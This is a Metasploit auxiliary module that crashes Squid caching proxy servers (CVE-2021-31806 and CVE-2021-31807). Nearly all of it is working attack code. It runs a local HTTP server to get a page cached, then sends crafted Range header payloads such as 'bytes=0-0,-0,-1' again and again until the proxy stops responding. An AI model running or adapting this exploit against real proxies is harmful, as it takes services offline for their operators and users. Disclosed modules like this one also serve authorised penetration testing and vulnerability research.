Squid Proxy Range Header Denial of Service

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::HttpServer  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Squid Proxy Range Header DoS',  
'Description' => %q{  
The range handler in The Squid Caching Proxy Server 3.0-4.1.4 and  
5.0.1-5.0.5 suffers from multiple vulnerabilities triggered  
by specific HTTP requests and responses.  
  
These vulnerabilities allow remote attackers to cause a  
denial of service through specifically crafted requests.  
},  
'Author' => [  
'Joshua Rogers' # Discoverer, and Metasploit Module  
],  
'License' => MSF_LICENSE,  
'Actions' => [  
['DOS', { 'Description' => 'Perform Denial of Service Against The Target' }]  
],  
'DefaultAction' => 'DOS',  
'References' => [  
[ 'CVE', '2021-31806'],  
[ 'CVE', '2021-31807'],  
[ 'URL', 'https://blogs.opera.com/security/2021/10/fuzzing-http-proxies-squid-part-2/']  
],  
'DisclosureDate' => '2021-05-27',  
'Notes' => {  
'Stability' => [ CRASH_SERVICE_DOWN ],  
'Reliability' => [ ],  
'SideEffects' => [ IOC_IN_LOGS ]  
}  
)  
)  
  
register_options(  
[  
Opt::RPORT(3128),  
OptInt.new('REQUEST_COUNT', [ true, 'The number of requests to be sent, as well as the number of re-tries to confirm a dead host', 50 ]),  
OptEnum.new('CVE', [  
true, 'CVE to check/exploit', 'CVE-2021-31806',  
['CVE-2021-31806', 'CVE-2021-31807']  
]),  
]  
)  
end  
  
def on_request_uri(cli, _request)  
# The Last-Modified response header must be set such that Squid caches the page.  
send_response(cli, '<html></html>', { 'Last-Modified' => 'Mon, 01 Jan 2020 00:00:00 GMT' })  
end  
  
def run  
count = 0  
error_count = 0 # The amount of connection errors from the server.  
reqs = datastore['REQUEST_COUNT'] # The maximum amount of requests (with a valid response) to the server.  
  
print_status("Sending #{reqs} DoS requests to #{peer}")  
  
start_service  
  
while reqs > count  
begin  
res = req(datastore['CVE'])  
rescue Errno::ECONNRESET  
res = nil  
end  
  
if res && (res.code == 200) && (count == 0)  
count = 1  
print_status("Sent first request to #{rhost}:#{rport}")  
elsif res  
print_status("Sent DoS request #{count} to #{rhost}:#{rport}")  
count += 1  
error_count = 0  
  
next # Host could be completely dead, or just waiting for another Squid child.  
elsif count == 0  
print_error('Cannot connect to host.')  
return  
end  
  
error_count += 1  
next unless error_count > reqs # If we cannot connect after `res` amount of attempts, assume the DoS was successful.  
  
print_good('DoS completely successful.')  
report_vuln(  
host: rhost,  
port: rport,  
name: name,  
refs: references  
)  
return  
end  
print_error('Looks like the host is not vulnerable.')  
end  
  
def req(cve)  
case cve  
when 'CVE-2021-31806'  
sploit = cve_2021_31806  
when 'CVE-2021-31807'  
sploit = cve_2021_31807  
end  
  
send_request_raw({  
'uri' => get_uri,  
'headers' => {  
'Host' => "#{srvhost_addr}:#{srvport}",  
'Range' => sploit,  
'Cache-Control' => 'public'  
}  
})  
end  
  
def cve_2021_31806  
# This will cause Squid to assert with "http->out.offset <= start"  
%(bytes=0-0,-0,-1)  
end  
  
def cve_2021_31807  
# This will cause Squid to assert with "!http->range_iter.debt() == !http->range_iter.currentSpec()"  
%(bytes=0-0,-4,-0)  
end  
  
end  
`